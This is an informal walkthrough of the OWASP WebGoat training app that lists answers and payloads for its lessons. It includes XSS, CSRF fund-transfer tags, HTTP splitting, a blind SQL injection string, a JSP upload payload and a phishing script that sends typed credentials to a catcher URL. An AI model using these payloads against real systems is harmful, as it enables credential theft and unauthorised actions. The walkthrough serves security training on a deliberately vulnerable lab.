OWASP WebGoat:-
First, Run webgoatIf you are using virtual machine .ova file, then open that I.P. Which is provided by the virtual machine
e.g:- URL: 192.168.1.26 ( It can be change in your case )
General
Http Basics
This tutorial will show you that how Http Reverse function Work.
Enter any name in input field then result will show in input field reverse.
E.g: Aryan = nayrA
HTTP Splitting
This Tutorial divided in 2 stage.
Encode the code given below:-
website:- http://yehg.net/encoding/
Click on it. [encodeURIComponent]
After encode the code put it in input field. then click on 'SEARCH' button.
Stage 1: HTTP Splitting
en
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 31
<html>White Hat Aryan</html>
Stage 2: Cache Poisoning:-
en
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 15 Oct 2222 15:27:28 GMT
Content-Length: 31
<html>White Hate Aryan: Cache Poisoning Done</html>
Access Control Flaws
Using an Access Control Matrix
In this tutorial you have to explore every user and you have to find that who is 'Account Manager'
Select user:- Larry
Select resource:- Account Manager
Bypass a Path Based Access Control Scheme
Select any file from select input and open Inspect Element and change the
value="../../reportBug.jsp" the click view file.
LAB: Role Based Access Control
Stage 1: Bypass Business Layer Access Control
Login with Tom Password is 'tom'
Then open burp suite and start intercept and click on view
See in burp suite and change 'action=ViewProfile' to action=DeleteProfile.
Stage 2: Add Business Layer Access Control
This is developer viersion
Stage 3: Bypass Data Layer Access Control
Login with Tom Password is 'tom' then click on 'Search Staff' then type any other name
like Moe password is 'moe' then click on Edit Profile and change the content of profile
in any field and click 'Update Profile'.
Stage 4: Add Data Layer Access Control
This is Developer version
Remote Admin Access
AJAX Security
Same Origin Policy Protection
Click one by one at the bottom's link.
Click here to try a Same Origin request:
lessons/Ajax/sameOrigin.jsp
Click here to try a Different Origin request:
http://www.google.com/search?q=aspect+security
LAB: DOM-Based cross-site scripting
STAGE:1 - copy the image location link. which is showing by name 'Location: OWASP IMAGE'
and type a html image tag. e.g- <img src="images/logos/owasp.jpg"/>
STAGE:2 - <img src="abc" onerror="alert('done')"/>
STAGE:3 - <iframe src="javascript:alert("done")"></iframe>
STAGE:4 - Copy the fake login page. and paste in input field. then enter any password in input field.
STAGE:5 -
LAB: Client Side Filtering
STAGE:1 - Right click on select user:[Choose Employee] field. then click on inspect element.
Then find hidden table 'hiddenEmployeeRecords', Then Expand html tables.
>table >div >table >tbody >tr. find the 'Neville' Sallary
Sallary 450000
Then answer the quistion Neville salary 450000 then click Submit Answer
STAGE:2 -
DOM Injection
Right click on 'Acivate!'. Then delete disabled="" then click on Activate! button.
XML Injection
Enter account ID: 836239 in input field, some rewards will show bellow, Right click on any reward and
JSON Injection
In this tutorial you have to buy NON STOP Ticket. there are two tickets available
1 is NON STOP $600
2 is TWO STOPS $300
Now you have to buy NON STOP ticket in cheaper price.
Right click on $600 then change the price $600 to $300 then click on 'SUBMIT' button.
Silent Transactions Attacks
Enter this javascript code in url box and press enter.
javascript:submitData(132,4444444444444444);
Dangerous Use of Eval
Enter this code in input 'Enter your three digit access code:'
123');alert(document.cookie);('
Insecure Client Storage
STAGE:1 - Right click anywhere on your browser and open source code and find 'javascript/clientSideValidation.js'
Then click javascript/clientSideValidation.js to open.
Once open clientSideValidation.js file you will see some "coupons", and some function are running
in this file
Like:- isValidCoupon(coupon) and decrypt(code).
The coupons are in encrypted value you have to decrypt any coupon with 'decrypt(code)' function
which is running on
clientSideValidation.js file.
Enter this code on url box
javascript:alert(decrypt("emph"));
Then it will show you Decrypt value of 'emph' coupon, which GOLD.
Enter GOLD in input field "Enter your coupon code" then click [Purchase]
STAGE:2 - Enter Quantity of all the products, Now you have to change value of total amount.
Right click on Total amount value Like '$998.98' and change the value $998.98 to $0 then click Purchase.
Authentication Flaws
Password Strength
This tutorial will show you that, if you break a password, so How much time would you need to break that password
Copy all the password one by one and check the password strength, by google.
e.g.:- 123456 = 1 second
abzfez = 1 second
a9z1ez = Some Minuts
aB8fEz = Some hours
z8!E?7 = Some days
It's Depend on your device performance.
Forgot Password
You have to reset admin's password
Enter user name = 'admin' and answer the secret quistion
What is your fav color?
Now you have to Brute Force on it using burp suite or you can try multiple login
Majorly, we have seven colors, so do brute force on it using burp suite
Answer is 'green'.
Basic Authentication
What is the name of the authentication header: = Authorization
What is the decoded value of the authentication header: = root:owaspbwa or webgoat:webgoat
Multi Level Login 2
Login as Joe password is banana, then start Intercept using burp suite Enter TAN #1 15161
Then change hidden_user=Joe to hidden_user=Jane and click Forword.
Multi Level Login 1
STAGE:1 - Login as Jane password is tarzan.
STAGE:2 - Logout the session and again Login With Jane password is tarzan, Now start intercept,
and Enter TAN #2 15648 then change hidden_tan=2 to hidden_tan=1 in burp suite and click forward.
Buffer Overflows
Off-by-One Overflows
Type any name in First name and Last name and Enter approx 4100 characters in Room No. Field then click submit
Then it will show you Available Price Plans: simply click on Accept Terms. Done!
Code Quality
Discover Clues in the HTML
Right click on anywhere on your browser then open source code then you have to find some credentials
like user name and password
Deveploper keep some credentials in html via comment,
<!-- FIXME admin:adminpw --><!-- Use Admin to regenerate database -->
Enter the user name and password then click Login.
Concurrency
Thread Safety Problems
In this tutorilal you have to use two browser, open two browser and open concurrency Thread safety Problems
in both browser, Now in first browser Enter user name 'jeff' and Enter 'dave' user name in second browser,
Now you have to click Submit of both browser at the same time.
Shopping Cart Concurrency Flaw
In first browser Enter Quantity 1 in 1st first feild which is $169 and click Update Cart then click Purchase
fter clicked Purchase, In second browser Enter Quantity 1 in Third field Which is $1799 then click Update Cart
Now in first browser click confirm.
Cross-Site Scripting (XSS)
Phishing with XSS
Put The Form given in below in input field and click search.
After this a login and password form will show in below search-bar.
Enter user name and password and click submit, when click on submit button a function called hack()
name run and will show a popup, your login credentials show in alert popup.
<script>
function hack(){
alert("Login="+document.forms[0].user.value
+ "Password="+document.forms[0].pass.value);
XSSImage=new Image;
XSSImage.src="http://192.168.1.28/WebGoat/catcher?PROPERTY=yes"
+"?PROPERTY=yes"
+"&user="+document.forms[0].user.value
+"&password="+document.forms[0].pass.value;
}
</script>
<form>
<br><br><HR>
<H3>This feature requires account login:</H3>
<br><br>
Enter Username:<br><input type="text" id="user" name="user"><br>
Enter Password:<br><input type="password" name="pass"><br>
<input type="submit" name="login" value="login" onclick="hack()">
</form><br><br><HR>
LAB: Cross Site Scripting
Stage 1: Stored XSS
Login as TOM and click on ViewProfile then click on EditProfile.
Put the java script alert code '<script>alert("Hacked by WhiteHatAryan");</script> in Street Field and click on UpdateProfile, when will click on UpdateProfile a alert function run.
After this logout your profile and login with 'jerry' profile, then click ViewProfile, if again alert function will call that means jerry effected by stored xss attack.
Stage 2: Block Stored XSS using Input Validation
For Developer
Stage 3: Stored XSS Revisited
Login with bruce and click on ViewProfile.
Stage 4: Block Stored XSS using Output Encoding
For Developer
Stage 5: Reflected XSS
Login with 'Larry', click on SearchStaff then Enter javascript code.
<script>alert("Hacked by WhiteHatAryan");</script>
Stage 6: Block Reflected XSS
For Developer
Stored XSS Attacks
Put the title anything, and Enter '<script>alert("Hacked by WhiteHatAryan");</script>' in message field then click on submit, Title will show in message list as link, click on it and if alert function will call its mean that is effected by stored xss attack.
Reflected XSS Attacks
Enter java scirpt code, in 'Enter your three digit access code:'
<script>alert("Hacked by WhiteHatAryan");</script>
Cross Site Request Forgery (CSRF)
Enter any title in title field, then enter the code in message field and click submit, code given below.
<img src="http://192.168.42.83/WebGoat/attack?Screen=52&menu=900&transferFunds=6000" width="1" height="1" />
or if it's not working, then you can use this by url.
e.g.:- http://192.168.42.83/WebGoat/attack?Screen=52&menu=900&transferFunds=6000
NOTE-
CSRF Prompt By-Pass
Enter any title in title field, then enter the code in message field and click submit, code given below.
<img src="http://192.168.42.83/WebGoat/attack?Screen=52&menu=900&transferFunds=6000&transferFunds=CONFIRM" width="1" height="1" />
or if it's not working, then you can use this by url.
e.g.:- http://192.168.42.83/WebGoat/attack?Screen=52&menu=900&transferFunds=6000&transferFunds=CONFIRM
NOTE-
CSRF Token By-Pass
HTTPOnly Test
Cross Site Tracing (XST) Attacks
Improper Error Handling
Fail Open Authentication Scheme
Injection Flaws
Command Injection
Numeric SQL Injection
Log Spoofing
XPATH Injection
String SQL Injection
LAB: SQL Injection
Stage 1: String SQL Injection
Stage 2: Parameterized Query #1
Stage 3: Numeric SQL Injection
Stage 4: Parameterized Query #2
Modify Data with SQL Injection
Add Data with SQL Injection
Database Backdoors
Blind Numeric SQL Injection
101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 1000 );
Blind String SQL Injection
Denial of Service
Denial of Service from Multiple Logins
Insecure Communication
Insecure Login
Insecure Configuration
Forced Browsing
Insecure Storage
Encoding Basics
Malicious Execution
Malicious File Execution
First save the code in .jsp file extention.
<HTML> <% java.io.File file = new java.io.File("/var/lib/tomcat6/webapps/WebGoat/mfe_target/root.txt"); file.createNewFile(); %> </HTML>
Now click Browse and select the .jsp file which you saved like- (hack.jsp).
Then click start upload, then right click on your current image and copy the image link
open a new tab in your browser and enter the link and hit enter then refresh your webgoat's tab.
Parameter Tampering
Bypass HTML Field Restrictions
first right click on 'Disabled input field' then click on inspect element and Delete the disabled="" in input field.
After this open Burp suite and start intercept, then enter any word in disabled input field then click submit
then change the all values in Burp suite.
e.g.- select=foo&radio=foo&checkbox=on&shortinput=12345&disabledinput=disabled+any+word&SUBMIT=Submit TO
select=fooooo&radio=foooo&checkbox=off&shortinput=123456789&disabledinput=disabledanyword&SUBMIT=Submit2
Exploit Hidden Fields
Start Burp suite and do intercept, click on Purchase and change the Price in burp suite.
Exploit Unchecked Email
1- Enter the javascript alert code in comment box, <script>alert('White hat aryan');</script>
2- Start burp suite and do intercept, then enter the javascript code in comment box, <script>alert('White hat aryan');</script> , and change admin to guest.
Bypass Client Side JavaScript Validation
Session Management Flaws
Hijack a Session
Spoof an Authentication Cookie
Session Fixation
Web Services
Create a SOAP Request
WSDL Scanning
Web Service SAX Injection
Web Service SQL Injection
Admin Functions
Report Card
Summary Report Card
Refresh Database
User Information
Product Information
Adhoc Query
Challenge
The CHALLENGE!
